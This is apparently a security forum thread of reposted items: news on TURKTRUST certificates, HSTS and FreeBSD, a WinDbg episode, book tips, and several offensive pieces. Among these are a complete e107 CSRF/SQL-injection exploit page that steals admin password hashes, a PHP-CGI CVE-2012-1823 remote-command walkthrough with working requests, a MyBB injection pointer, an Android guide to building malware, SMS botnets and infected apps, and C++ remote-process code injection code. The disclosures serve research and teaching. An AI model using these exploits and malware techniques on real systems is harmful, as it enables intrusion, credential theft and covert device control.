Nytro

[h=2]Hacker Database[/h]Browse the World's Largest Public Hacker Database Link: http://www.soldierx.com/hdb Haters gonna hate : TinKode, sysgh0st | SOLDIERX.COM

[h=1]TURKTRUST CA Problems[/h] Kurt Baumgartner Kaspersky Lab Expert Posted January 03, 21:04 GMT Microsoft just publicly announced a release to actively "untrust" three certificates issued by Certificate Authority TURKTRUST and its Intermediate CAs, a subsidiary of the Turkish Armed Forces ELELE Foundation Company. According to Microsoft, the company made a couple major mistakes resulting in fraudulent certificate issuance that could be used to MiTM encrypted communications or spoof gmail and a long list of other google properties. A Chrome installation detected a "an unauthorized digital certificate for the "*.google.com" domain" late the night of Dec. 24th 2012, and the Google security team's investigation began there. TURKTRUST's mistakes included issuing two certificates incorrectly. They created digital certificates for *.EGO.GOV.TR and e-islem.kktcmerkezbankasi.org. Both of these certs lacked CRL or OCSP extensions and were incorrectly issued as end-entity certs. These mistakes enabled the *.EGO.GOV.TR authority to be misused and fraudulently issue a certificate for *.google.com. Microsoft is not only issuing fixes for this CA trust problem, but including known CA fixes in the recent past. This list of Google properties are fixed by the release: *.google.com *.android.com *.appengine.google.com *.cloud.google.com *.google-analytics.com *.google.ca *.google.cl *.google.co.in *.google.co.jp *.google.co.uk *.google.com.ar *.google.com.au *.google.com.br *.google.com.co *.google.com.mx *.google.com.tr *.google.com.vn *.google.de *.google.es *.google.fr *.google.hu *.google.it *.google.nl *.google.pl *.google.pt *.googleapis.cn *.googlecommerce.com *.gstatic.com *.urchin.com *.url.google.com *.yo utube-nocookie.com *.youtube.com *.ytimg.com android.com g.co goo.gl google-analytics.com google.com googlecommerce.com urchin.com youtu.be youtube.com The release may cause some confusion. The vendors are handling the incident differently - the three certificates that are being "untrusted" by Microsoft do not include the TURKTRUST Trusted Root CA certificate itself. But the certificates for the two intermediate authorities are effected, as is the fraudulent Google property certificate. Also adding to the confusion is the fact that some systems seem to have TURKTRUST certificates included as a Trusted Root Certificate Authority on their Windows system, but others do not. This inclusion has to do with the ways in which Microsoft updates their root certificate stores on newer systems vs. older Windows OS systems. Microsoft provides a knowledge base article that presents all of the gory details on Microsoft Root Certificate updates. Just follow the link and go to the section "How Windows Updates Root Certificates", where you will find information on both Windows Vista and Windows 7, on Windows XP and its manual update root package, and on Windows Server 2003, Windows Server 2008, Windows Server 2008 R2 OS systems. To sum it up, most users that do not visit web sites in the Middle East, especially Turkey and Cyprus, will not have the TURKTRUST Trusted Root CA certificate installed on their system (although Google did not disclose the location of the detected fraudulent certificate). So, for the most part, this release does not directly effect their system. Also, most helpful here is the automatic updater of revoked certificates released by Microsoft back in June, available for Windows Vista Service Pack 2, Windows Server 2008 Service Pack 2, Windows 7, and Windows Server 2008 R2. Both Mozilla and Google posted information about the problem. Google pushed Chrome’s certificate revocation metadata on December 24th and 25th to block both of the Intermediate Certificate Authority certificates. An ongoing discussion exists over at the mozilla.dev.security.policy group. It appears that Mozilla is the only vendor of the three to altogether suspend trust in the TURKTRUST root CA cert: "We have also suspended inclusion of the “TÜRKTRUST Bilgi Ýletiþim ve Biliþim Güvenliði Hizmetleri A.Þ. © Aralýk 2007” root certificate, pending further review". Please see the long list of links at the right side of the page for more information from the vendors and posts on past CA issues. Sursa: TURKTRUST CA Problems - Securelist

Analytical Summary Of The Blackhole Exploit Kit Description: ANALYTICAL SUMMARY OF THE BLACKHOLE EXPLOIT KIT Almost Everything You Ever Wanted To Know About The BlackHole Exploit Kit There are hundreds, if not thousands, of news articles and blog posts about the BlackHole Exploit Kit. Usually, each story covers only a very narrow part of the subject matter. This talk will summarize the history of the BlackHole Exploit Kit into one easy to follow story. There will be diagrams and flow-charts for explaining code, rather than a giant blob of illegible Javascript, PHP, or x86 Assembly. A. What a browser exploit kit is, and what it isn't It only does exploits Directing victims to the exploits is out of scope Usually done with spam or iframe injections The actual malware installed is out of scope too Where is exploit kit is hosted, is also quite variable B. Timeline Version 1.0.0 - September 2010 i. It's not that different from other exploit kits Version 1.0.1 Version 1.0.2 - November 2010 i. Changelog ii. Leaked in May 2011 Version 1.1.0 - December 2010 i. Changelog Version 1.2.0 - August 2011 i. Changelog Version 1.2.1 - December 2011 Version 1.2.2 i. Cryptome "Virus" Version 1.2.3 - March 2012 Version 1.2.4 - June 2012 i. CVE-2012-1723 ii. CVE-2011-2110 Version 1.2.5 - July 2012 i. CVE-2012-1889 ii. A single IFRAME injection campaign uses a temporal 'Domain Generation Algorithm' August 2012 i. CVE-2012-4681 Version 2.0.0 - September 2012 i. Changelog ii. The official announcement isn't entirely true. C. The "Free Version" Pulled from a system with C99 Shell IonCube "copy protection" How to break IonCube obfuscation Analysis of PHP Source Code D. Open Source Code in use PluginDetect MaxMind GeoIP etc. E. The Exploits CVE-2010-0188 etc. etc. etc. as time allows X. There is almost no change in the expliots themselves from one version of the exploit kit to the next. Y. Currious clues about the possible authorship of some exploits Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Analytical Summary Of The Blackhole Exploit Kit

Beef - Java Payload Exploitation Description: In this video I will show you how to exploit a system using BeEF Browser Exploitation Framework and Java Payload Module. In BeEF Framework there is one module available called Java Payload in local exploits we are going to use that module and exploiting the windows -7 system. So, first you need to hook the browser and use that module victim will get the Java Pop-up if he click on OK you will get the meterpreter shell in some time Note for getting session it will take some time so be patient. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Beef - Java Payload Exploitation

[h=1]Clickjacking Flaws Expose Details of Live, Yahoo!, Google and Amazon Users – Video[/h]January 3rd, 2013, 15:33 GMT · By Eduard Kovacs Security researcher Luca De Fulgentis has identified a number of user interface redressing (clickjacking) vulnerabilities in popular services that could be leveraged by cybercriminals to gather user information in what’s known as identification attacks. He has also identified a clickjacking flaw in Google Chrome. The fact that many websites don’t use the X-Frame-Options header or other anti-clickjacking mechanisms allows an attacker to harvest all sorts of information if he can trick the victim into clicking on apparently innocent links or buttons. The expert has demonstrated that such an issue in support.google.com can be used to extract a user’s email address, full name and profile picture URL. The names, email addresses and other details of Microsoft Live and Yahoo! users could also be easily obtained by leveraging clickjacking vulnerabilities. However, the most interesting finding of De Fulgentis is a Chrome vulnerability that allows attackers to extract user information despite the many security mechanisms implemented by Google, such as denying the use of the view-source handler and disallowing cross-origin drag and drop. “Instead of a cross-origin drag&drop, the victim is tricked to perform a same-origin action, where the dragged content belongs to a vulnerable web page of the targeted application and the ‘dropper’ is a form (text area, input text field, etc.) located on the same domain,” the researcher explained. “Using a site's functionality that allows publishing externally-facing content, it is still possible to extract information. Under these circumstances, Chrome will not reasonably deny the same-origin drag&drop, thus inducing the victim to involuntary publish sensitive data.” To demonstrate how such attacks work, the expert has published a couple of proof-of-concept videos showing how the vulnerability could be leveraged against Google and Amazon users. Earlier in December, De Fulgentis published the details of a similar vulnerability that affected Firefox. Here are the proof-of-concept videos published by the expert: Sursa: Clickjacking Flaws Expose Details of Live, Yahoo!, Google and Amazon Users – Video - Softpedia

Stiam ca e un macro, dar nu stiam cum e definit si dupa mici cautari: WinBase.h #define ZeroMemory RtlZeroMemory RtlZeroMemory e definit in WDH.h: #define RtlZeroMemory(Destination,Length) memset((Destination),0,(Length)) Aparent e acelasi lucru. E probabil insa sa fie mici diferente la apel, "memset" probabil va apela wrapper-ul din runtime-ul de la Visual C iar apelul ZeroMemory e posibil sa fie executat direct in kernel (RtlZeroMemory routine (Windows Drivers)). O sa fac putin research sa vad.

[h=1]Defrag Tools: #21 - WinDbg - Memory User Mode[/h]By: Larry Larsen, Andrew Richards, Chad Beeder 33 minutes, 48 seconds [h=3]Download[/h] [h=3]How do I download the videos?[/h] To download, right click the file type you would like and pick “Save target as…” or “Save link as…” [h=3]Why should I download videos from Channel9?[/h] It's an easy way to save the videos you like locally. You can save the videos in order to watch them offline. If all you want is to hear the audio, you can download the MP3! [h=3]Which version should I choose?[/h] If you want to view the video on your PC, Xbox or Media Center, download the High Quality WMV file (this is the highest quality version we have available). If you'd like a lower bitrate version, to reduce the download time or cost, then choose the Medium Quality WMV file. If you have a Zune, WP7, iPhone, iPad, or iPod device, choose the low or medium MP4 file. If you just want to hear the audio of the video, choose the MP3 file. Right click “Save as…” MP3 (Audio only) [h=3]File size[/h] 31.0 MB MP4 (iPod, Zune HD) [h=3]File size[/h] 185.9 MB Mid Quality WMV (Lo-band, Mobile) [h=3]File size[/h] 109.7 MB High Quality MP4 (iPad, PC) [h=3]File size[/h] 408.7 MB Mid Quality MP4 (WP7, HTML5) [h=3]File size[/h] 285.1 MB High Quality WMV (PC, Xbox, MCE) [h=3]File size[/h] 507.7 MB format < > embed + queue In this episode of Defrag Tools, Andrew Richards, Chad Beeder and Larry Larsen continue looking at the Debugging Tools for Windows (in particular WinDbg). WinDbg is a debugger that supports user mode debugging of a process, or kernel mode debugging of a computer. This installment goes over the commands used to show the memory used in a user mode debug session. We cover these commands: !address -summary !address <addr> !vprot <addr> !mapped_file <addr> Make sure you watch Defrag Tools Episode #1 for instructions on how to get the Debugging Tools for Windows and how to set the required environment variables for symbols and source code resolution. Resources: Microsoft Windows SDK for Windows 7 and .NET Framework 4 Sysinternals VMMap Performance and Memory Consumption Under WOW64 MEMORY_BASIC_INFORMATION structure Memory Protection Constants Timeline: [00:50] - Live Debug of Notepad [01:10] - VMMap of Notepad [02:08] - Virtual Address Space summary (!address -summary) [04:30] - 'Large Address Space Aware' increases the VA space from 2GB to 4GB [08:11] - Memory Mapped Files [10:11] - Memory Type, State and Protection (inc. Guard Pages) [21:22] - Allocation Base vs. Base Address (!address <addr>) [26:52] - Virtual Protection shows the Alloc. Base Protection (!vprot <addr>) [29:14] - Mapped Files (!mapped_file <addr>) Sursa: Defrag Tools: #21 - WinDbg - Memory User Mode | Defrag Tools | Channel 9

NFC - NEAR FIELD COMMUNICATION Subho Halder and Aditya Gupta ........................................................ INTRODUCTION Near Field Communication at glance. What is NFC ? NFC or Near Field Communication is a set of standards or protocols to communicate between two devices by either touching or bringing into close proximity ( less than 4 cm ). The communicating protocols of such devices are based on RFID Standards, including ISO 14443. These standards are defined and extended by the NFC Forum, which was founded on 2004 by some major companies such as Sony, Nokia, Philips, Samsung etc. The operating Frequency of such communication is merely 13.56 MHz ( +/- 7 ) which is very low. This gives an advantage of easily integrating into portable devices without the need of much battery power. Download: www.exploit-db.com/download_pdf/23826

[h=1]MyBB (editpost.php, posthash) SQL Injection Vulnerability[/h] MyBB <1.6.9 is vulnerable to Stored, Error based, SQL Injection. Vulnerable code: /editpost.php === Line 398 === $posthash_query = "posthash='{$posthash}' OR "; === It can be done by using Tamper Data(Or Live HTTP Headers), and when submitting a post, edit the 'posthash' POST parameter to your payload, submitting, then going to edit your post. Small "HOWTO" in picture: http://imgur.com/a/JxfEI This bug was not found by me, but afaik, I am the first one to release it. -- *Joshua Rogers* - Retro Game Collector && IT Security Specialist gpg pubkey <http://www.internot.info/docs/gpg_pubkey.asc.gpg> Sursa: MyBB (editpost.php, posthash) SQL Injection Vulnerability

[h=1]e107 v1.0.2 CSRF Resulting in SQL Injection[/h] # Exploit Title: e107 v1.0.2 Administrator CSRF Resulting in SQL Injection # Google Dork: intext:"This site is powered by e107" # Date: 01/01/13 # Exploit Author: Joshua Reynolds # Vendor Homepage: http://e107.org # Software Link: http://sourceforge.net/projects/e107/files/e107/e107%20v1.0.2/e107_1.0.2_full.tar.gz/download # Version: 1.0.2 # Tested on: BT5R1 - Ubuntu 10.04.2 LTS # CVE: CVE-2012-6434 ----------------------------------------------------------------------------------------- Description: Cross-Site Request Forgery vulnerability in the e107_admin/download.php page, which is also vulnerable to SQL injection in the POST form. The e-token or ac tokens are not used in this page, which results in the CSRF vulnerability. This in itself is not a major security vulnerability but when done in conjunction with a SQL injection attack it can result in complete information disclosure. The parameters which are vulnerable to SQL injection on this page include: download_url, download_url_extended, download_author_email, download_author_website, download_image, download_thumb, download_visible, download_class. The following is an exploit containing javascript code that submits a POST request on behalf of the administrator once the page is visited. It contains a SQL injection that would provide the username and password (in MD5) of the administrator to be added to the Author Name of a publicly available download. ------------------------------------------------------------------------------------------ Exploit: <html> <body onload="document.formCSRF.submit();"> <form method="POST" name="formCSRF" action="http://[site]/e107/e107102/e107_admin/download.php?create"> <input type="hidden" name="cat_id" value="1"/> <input type="hidden" name="download_category" value="2"/> <input type="hidden" name="download_name" value="adminpassdownload"/> <input type="hidden" name="download_url" value="test.txt', (select concat(user_loginname,'::',user_password) from e107_user where user_id = '1'), '', '', '', '', '0', '2', '2', '1352526286', '', '', '2', '0', '', '0', '0' ) -- -"/> <input type="hidden" name="download_url_external" value=""/> <input type="hidden" name="download_filesize_external" value=""/> <input type="hidden" name="download_filesize_unit" value="KB"/> <input type="hidden" name="download_author" value=""/> <input type="hidden" name="download_author_email" value=""/> <input type="hidden" name="download_author_website" value=""/> <input type="hidden" name="download_description" value=""/> <input type="hidden" name="download_image" value=""/> <input type="hidden" name="download_thumb" value=""/> <input type="hidden" name="download_datestamp" value=""/> <input type="hidden" name="download_active" value="1"/> <input type="hidden" name="download_datestamp" value="10%2F11%2f2012+02%3A47%3A47%3A28"/> <input type="hidden" name="download_comment" value="1"/> <input type="hidden" name="download_visible" value="0"/> <input type="hidden" name="download_class" value="0"/> <input type="hidden" name="submit_download" value="Submit+Download"/> </form> </body> </html> ------------------------------------------------------------------------------------------ Fix: This bug has been fixed in the following revision: r13058 ------------------------------------------------------------------------------------------ Shout outs: Red Hat Security Team, Ms. Umer, Dr. Wu, Tim Williams, friends, & family. Contact: Mail: infosec4breakfast@gmail.com Blog: infosec4breakfast.com Twitter: @jershmagersh Youtube: youtube.com/user/infosec4breakfast Sursa: e107 v1.0.2 CSRF Resulting in SQL Injection

WiFi Password Decryptor [TABLE] [TR] [TD][TABLE=width: 100%] [TR] [TD=align: justify]WiFi Password Decryptor is the FREE software to instantly recover Wireless account passwords stored on your system. [/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD=align: justify] It automatically recovers all type of Wireless Keys/Passwords (WEP/WPA/WPA2 etc) stored by Windows Wireless Configuration Manager. For each recovered WiFi account, it displays following information [/TD] [/TR] [TR] [TD] WiFi Name (SSID) Security Settings (WEP-64/WEP-128/WPA2/AES/TKIP) Password Type Password in clear text [/TD] [/TR] [TR] [TD=align: justify]After the successful recovery you can save the password list to HTML/XML/TEXT file. You can also right click on any of the displayed account and quickly copy the password. Under the hood, 'WiFi Password Decryptor' uses System Service method (instead of injecting into LSASS.exe) to decrypt the WiFi passwords. This makes it more safer and reliable. Also it makes us to have just single EXE to work on both 32-bit & 64-bit platforms. New version 1.5 supports command-line version making it useful for automation & penetration testers. It has been successfully tested on Windows Vista and higher operating systems including Windows 8. [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=class: page_subheader] Features & Benefits [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] Instantly decrypt and recover stored WiFi account passwords Recovers all type of Wireless Keys/Passwords (WEP/WPA/WPA2 etc) Command-line version for automation & penetration testers. Simple & elegant GUI interface makes it easy to use. Right click context menu to quickly copy the Password Sort feature to arrange the displayed passwords Save the recovered WiFi password list to HTML/XML/TEXT file. Integrated Installer for assisting you in local Installation & Uninstallation. [/TD] [/TR] [/TABLE] Details: http://securityxploded.com/wifi-password-decryptor.php Download: http://securityxploded.com/download.php#wifipassworddecryptor

[h=1]Exploit Development: PHP-CGI Remote Code Execution – CVE-2012-1823[/h]by infodox The CVE-2012-1823 PHP-CGI exploit was, quite possibly, one of the most groundbreaking exploits of 2012. In a year that brought us MS-12-020 (the most hyped bug in my recollection), multiple Java 0day exploits, and several MySQL exploits, the PHP-CGI bug still stands out as one of the most hilariously brilliant bugs to show up for several reasons. Primarily the massive misunderstanding of how it worked. For this exploit to work, PHP had to be running in CGI mode. A fairly obscure configuration not seen all too often in the wild. Essentially, with this vulnerability, you could inject arguements into the PHP-CGI binary and make changes to php.ini directives, allowing for remote code execution. Developing an exploit for this bug is trivial. In order to gain remote code execution, you tell PHP.ini that it is to allow URL inclusion ( allow_url_include = 1 ), and to automatically prepend the “file” php://input. This means whatever we send in the POST request is parsed as PHP, and executed. One way to exploit this (targetting example.com), using the lwp-request’s “POST” utility, is as follows. echo “<?php system(‘id’);die(); ?>” | POST “http://example.com/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input” As you will see in the video, we can easily use this to execute commands remotely from a BASH shell. The HTTP request sent, looks something similar to this: POST /?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1 TE: deflate,gzip;q=0.3 Connection: TE, close Host: example.com User-Agent: lwp-request/6.03 libwww-perl/6.04 Content-Length: 29 Content-Type: application/x-www-form-urlencoded <?php system(‘id’);die(); ?> he response to that was the server sending back the result of our command (id), so we know it works. So now we have a somewhat reliable “commandline” RCE method, however, we like to automate things… Let’s see how hard it is to write a reliable exploit in Python. The following screenshot shows exploitation using Python. Exploiting PHP-CGI bug with Python So, we know now that using Python’s requests library (a mainstay of all my exploits, as I guess you noticed). Now that we have reliable exploitation using Python, I decided to go a step further and write an actual exploit in Python to automate the whole thing. It simply drops you into a shell of sorts, giving you the ability to run commands as the web-user. Exploit code available here: Google Code – Insecurety Research So, along comes the demo, as usual in video format. This time, with additional tunes by Blackmail House who gave me permission to use their music in demo videos the other day in the pub Remember, play nice out there. Sursa: Exploit Development: PHP-CGI Remote Code Execution – CVE-2012-1823 | Insecurety Research

Hack Android With Android Exploitation Framework IMPORTANT NOTE: The below information is for educational and research purposes only and to illustrate how insecure the Android platform is. You would also come to see, how most of the present Android anti-malwares fail to detect threats in the current scenario. Also, infecting other persons computer/mobile devices with a malicious application without his permission is an punishable crime. Their exist a lot of tools to exploit the security holes in normal PC environment, but there have been really less tools for the Android environment, which at the same time is expandable. By expandable, i’m trying to say, that the users who use the framework, could build there own modules and share with the security community. Android Framework for Exploitation is an open-source project which we have developed in order to increase mobile security research, check for application based and platform based vulnerabilities, as well as write plugins for the framework and share it with the community. Subho Halder and me (Aditya Gupta) have developed a framework known as Android Framework for Exploitation, which we released in BlackHat Abu Dhabi in December 2012. The aim of this framework is to help the mobile security community to analyze applications, exploit vulnerabilities, build POCs, and share their own modules with other users. One of the interesting features of this framework is the ability to build malwares, botnets and even inject malwares in existing legitimate applications. This is just to show that how ineffective our current mobile anti malwares are against these type of infected version of legitimate applications, as at the time of writing, none of the anti malwares for Android detected the malware sample. Some of the features which we’ll be looking into this post is : 1. Creating a malware 2. Creating a botnet 3. Injecting malicious codes in a legitimate application 4. Analyzing vulnerable applications Before we go further, let us have a look at the file structure of AFE. Once you download AFE, you will be having a structure similar to the one given below. The Input will be containing all the input apk(s) for any processing, such as crypting the apk to make it undetectable from anti malwares, or inserting the apk in any other legitimate apk or so on. Creating a malware AFE gives the users to create malwares for their devices with prebuilt templates. You could also modify the source code of the malware, and modify the GUI of the application apk as you want. To create a malware, first of all you have to launch AFE by typing in ./afe. To get help at any point of time, just type in ? and hit enter. Note : This tool is made natively for *nix based systems. If you’re running Windows, you could use it by installing Cygwin. Also make sure you’ve all the dependencies such as Python and the android sdk installed. Once you are inside menu, type in run [the module name] to execute a particular module. In this case, the module is named malware. Once you type in run malware Just type in your local IP address in the Set Reverse IP option. Once you set your reverse IP (same as LHOST), you’ll have the option of Stealer. There are 3-predefined stealers, and you can add more yourself. The 3 already existing ones include – • Call Logs • Contacts • Messages Here’s a video of it. Creating a Botnet To create a botnet, you have to launch AFE as mentioned earlier. and go on to create a botnet, similar to as we did in the last demo. Once you’ve created and installed the botnet in any android based smartphone, you could control it by sending SMS from any phone to the infected phone, and getting the response back using SMS itself. Also, this whole process will go on in the background, so the user won’t be able to know if any kind of malicious activity is being performed. Some of the sms based commands are : toast: To display a particular message on the screen infect: To spread the botnet to any other device by sending a sms from already infected device browse : automatically open a URL on the victim’s phone shell : The most useful command. Could be used to execute any shell based commands. For example, xysec shell cat /proc/version Note: All the commands should be appended with the keyword ‘xysec’ - this could be changed by modifying the source of the botnet. This is to make sure the SMS which has been send as a command won’t be displayed in the notification of the victim. Analyzing Application for Leaking Content Providers One of the most important components of Android applications while working with application data is Content Providers. To get the content providers of the application, you could either reverse the application manually, or look for the content providers, or you could use tool such as Apktool, and parse information based on the filter of content:// To find content providers with the help of AFE, you need to place the application you want to analyse in the Input folder. Once we select the application, it will automatically present us with the list of content providers present in the application. After finding out the permission of the content providers, and if it is set as exported without any permission checking, the application is vulnerable to leaking content providers vulnerability. To make a POC of this vulnerability, we could use the content provider (vulnerable one) and make another application parsing this content provider. Following is a sample code snippet we made: We are accessing the Vulnerable application’s data using its content provider. Uri.parse("> We would in further update the Github repo located at https://github.com/xysec/AFE/ to make POCs automatically. Injecting malicious codes in legitimate application Using AFE, you could inject malicious codes in legitimate applications. This is to demonstrate how easy it is for malware authors to create infected version of the legitimate applications, and how anti-malwares should improve their detection strategy to distinguish between fake and legitimate applications. To create the application: Select the malware to be injected, Choose the target apk Type inject Once we select our target application, it will inject all the services and permissions from our malware (which we have already created) and even sign the newly create application with our key. The newly created file will be stored in /Output as the name of [originalapp].apk and [originalapp]_signed.apk. Creating Plugins for AFE AFE is an extendable framework, which could be integrated with user made plugins. To create a plugin, you need to go to the modules directory and create a directory with the name of your plugin name. Let us take an example of a plugin named as DB Stealer. This plugin, grabs all the database files (.db) from the device or emulator, and saves it on the system. The code for this plugin has been written in PHP. There are 3 necessary files : Run.sh dbstealer.php dbstealer.info Run.sh is the initializing code, which will load up the entire code (written in any language, in this case php), and will execute it. The second file, dbstealer.php is the main code of the plugin. It is loaded from run.sh with the code php dbstealer.php. The third file dbstealer.info will contain the information about the plugin, which will be displayed when the user will type in info dbstealer from the afe prompt. Hope you guys enjoyed the post. Feel free to mail us at security@xysec.com for any bug issues/suggestions/trainings/ideas! Sursa: Hack Android With Android Exploitation Framework | Learn How To Hack - Ethical Hacking and security tips

Pot sa va recomand ceva? Se numesc "car?i". Java de la 0 la expert (Necartonat) - Stefan Tanasa, Cristian Olaru, Stefan Andrei POL978-973-46-2405-8 - eMAG.ro Totul despre C si C++ manualul fundamental de programare in C si C++ - Kris Jamsa, Lars Klander TEO973-601-911-X - eMAG.ro C++ introducere in standard template library ALL973-571-798-8 - eMAG.ro Programare web in Bash si Perl - Sabin Buraga, Victor Tarhon-Onu, Stefan Tanasa POL973-683-931-1 - eMAG.ro Sql - Marin Fotache POL973-683-709-2 - eMAG.ro Tehnici De Web Design MCO973-000-000-19 - eMAG.ro Limbajul C# pentru incepatori - Notiuni de baza - Liviu Negrescu, Lavinia Negrescu ALB973-650-153-1 - eMAG.ro Secrete C++ - Constantin Galatan ALB973-650-186-8 - eMAG.ro Si sunt foarte multe, foarte detaliate, va garantez ca veti intelege. Este de preferat sa si aplicati pe masura ce cititi ceea ce gasiti prin ele.

[h=1]HTTP Strict Transport Security[/h] The lack of (or inconsistent use of) SSL puts users’ security and privacy at risk. Increasingly, popular sites require SSL not only for operations which are known to directly involve private data (login, etc) but for entire sessions. This is a good thing. Unfortunately, there are a number of techniques an attacker can use to work around this. The most well known of these is SSL-Stripping in which an active man-in-the-middle can intercept traffic between the browser and the server, downgrading what should be an HTTPS connection to an unencrypted HTTP connection. HSTS (HTTP Strict Transport Security) is designed to make attacks like this harder; it allows servers to specify that all subsequent connections must be made via HTTPS for a specified period of time. If a request is made over HTTP it will be automatically upgraded by the browser. Also, if the SSL certificate for an HSTS enabled site can’t be verified, the requested document won’t be loaded. There’s a gap in this protection though; if your initial connection to a site is intercepted, not only could your connection still be downgraded but the attacker could also stop the browser from seeing the HSTS header too. This can be resolved for popular sites that use HSTS by means of an in-browser preload list (coming soon in Firefox 17 – currently in Beta). You can read more about preloading HSTS in our earlier post on the subject. Firefox has supported HSTS since version 4; we think it’s about time your site did too. You can learn more about HSTS and how to implement it in this article on MDN. Sursa: HTTP Strict Transport Security | Mozilla Security Blog

FreeBSD 9.1-RELEASE Announcement The FreeBSD Release Engineering Team is pleased to announce the availability of FreeBSD 9.1-RELEASE. This is the second release from the stable/9 branch, which improves on the stability of FreeBSD 9.0 and introduces some new features. Some of the highlights: New Intel GPU driver with GEM/KMS support netmap(4) fast userspace packet I/O framework ZFS improvements from illumos project CAM Target Layer, a disk and processor device emulation subsystem Optional new C++11 stack including LLVM libc++ and libcxxrt Jail devfs, nullfs, zfs mounting and configuration file support POSIX2008 extended locale support, including compatibility with Darwin extensions oce(4) driver for Emulex OneConnect 10Gbit Ethernet card sfxge(4) driver for 10Gb Ethernet adapters based on Solarflare SFC9000 controller Xen Paravirtualized Backend Ethernet Driver (netback) improvement hpt27xx(4) driver for HighPoint RocketRAID 27xx-based SAS 6Gb/s HBA GEOM multipath class improvement GEOM raid class is enabled by default supporting software RAID by deprecated ataraid(8) kernel support for the AVX FPU extension Numerous improvements in IPv6 hardware offload support Please note that precompiled third-party packages are not available for 9.1-RELEASE at the time of release. See the Availability section below for further details. For a complete list of new features and known problems, please see the online release notes and errata list available at: FreeBSD 9.1-RELEASE Release Notes FreeBSD 9.1-RELEASE Errata For more information about FreeBSD release engineering activities please see: Release Engineering Information Sursa: FreeBSD 9.1-RELEASE Announcement

[h=1]Code Injections [beginner and advanced][/h]Author: [h=3]RosDevil[/h] This tutorial is for every level, from beginners to advanced (so to review some aspects or istructions) I will use as much as i can C++ in this tutorial. We're going through all kinds of injection. Before any type of injection we need to get the right privileges, SE_DEBUG_NAME, this is the function to get it: int privileges(){ HANDLE Token; TOKEN_PRIVILEGES tp; if(OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,&Token)) { LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid); tp.PrivilegeCount = 1; tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; if (AdjustTokenPrivileges(Token, 0, &tp, sizeof(tp), NULL, NULL)==0){ return 1; //FAIL }else{ return 0; //SUCCESS } } return 1; } after we need the PID of the target application, it can be got so: DWORD getPid(string procName){ HANDLE hsnap; PROCESSENTRY32 pt; hsnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); pt.dwSize = sizeof(PROCESSENTRY32); do{ if(!strcmp(pt.szExeFile, procName.c_str())){ DWORD pid = pt.th32ProcessID; CloseHandle(hsnap); return pid; } } while(Process32Next(hsnap, &pt)); CloseHandle(hsnap); return 0; } now let's get started with injections: 1) Codecave Injection with CreateRemoteThread() This method has been treated a lot on internet so i won't go through the code step by step, if you want to see the documented functions go to msdn. steps: - Open the target Process through the PID (Api used: OpenProcess()) - Allocate space in the remote process for our function and parameters (Api used: VirtualAllocEx()) - Write our function and parameters in the remote process (Api used: WriteProcessMemory()) - Execute the remote code and optionally free the remote memory (Api used: CreateRemoteThread() and VirtualFree()) #include <windows.h> #include <iostream> #include <fstream> #include <stdlib.h> #include "ntdef.h" #include <tlhelp32.h> typedef int (WINAPI* MsgBoxParam)(HWND, LPCSTR, LPCSTR, UINT); using namespace std; struct PARAMETERS{ DWORD MessageBoxInj; char text[50]; char caption[25]; int buttons; // HWND handle; }; DWORD getPid(string procName); int privileges(); DWORD myFunc(PARAMETERS * myparam); DWORD Useless(); int main() { privileges(); DWORD pid = getPid("notepad.exe"); if (pid==0) return 1; //error HANDLE p; p = OpenProcess(PROCESS_ALL_ACCESS,false,pid); if (p==NULL) return 1; //error char * mytext = "Hello by CodeCave!"; char * mycaption = "Injection result"; PARAMETERS data; //let's fill in a PARAMETERS struct HMODULE user32 = LoadLibrary("User32.dll"); data.MessageBoxInj = (DWORD)GetProcAddress(user32, "MessageBoxA"); strcpy(data.text, mytext); strcpy(data.caption, mycaption); data.buttons = MB_OKCANCEL | MB_ICONQUESTION; DWORD size_myFunc = (PBYTE)Useless - (PBYTE)myFunc; //this gets myFunc's size //--------now we are ready to inject LPVOID MyFuncAddress = VirtualAllocEx(p, NULL, size_myFunc, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE); WriteProcessMemory(p, MyFuncAddress, (void*)myFunc,size_myFunc, NULL); LPVOID DataAddress = VirtualAllocEx(p,NULL,sizeof(PARAMETERS),MEM_RESERVE|MEM_COMMIT,PAGE_READWRITE); WriteProcessMemory(p, DataAddress, &data, sizeof(PARAMETERS), NULL); HANDLE thread = CreateRemoteThread(p, NULL, 0, (LPTHREAD_START_ROUTINE)MyFuncAddress, DataAddress, 0, NULL); if (thread!=0){ //injection completed, not we can wait it to end and free the memory WaitForSingleObject(thread, INFINITE); //this waits untill thread thread has finished VirtualFree(MyFuncAddress, 0, MEM_RELEASE); //free myFunc memory VirtualFree(DataAddress, 0, MEM_RELEASE); //free data memory CloseHandle(thread); CloseHandle(p); //don't wait for the thread to finish, just close the handle to the process cout<<"Injection completed!"<<endl; }else{ cout<<"Error!"<<endl; } system("PAUSE"); return EXIT_SUCCESS; } DWORD getPid(string procName){ HANDLE hsnap; PROCESSENTRY32 pt; hsnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); pt.dwSize = sizeof(PROCESSENTRY32); do{ if(pt.szExeFile == procName){ DWORD pid = pt.th32ProcessID; CloseHandle(hsnap); return pid; } } while(Process32Next(hsnap, &pt)); CloseHandle(hsnap); return 0; } DWORD myFunc(PARAMETERS * myparam){ MsgBoxParam MsgBox = (MsgBoxParam)myparam->MessageBoxInj; int result = MsgBox(0, myparam->text, myparam->caption, myparam->buttons); switch(result){ case IDOK: //your code break; case IDCANCEL: //your code break; } return 0; } DWORD Useless(){ return 0; } //this function is needed to get some extra privileges so your code will be able to 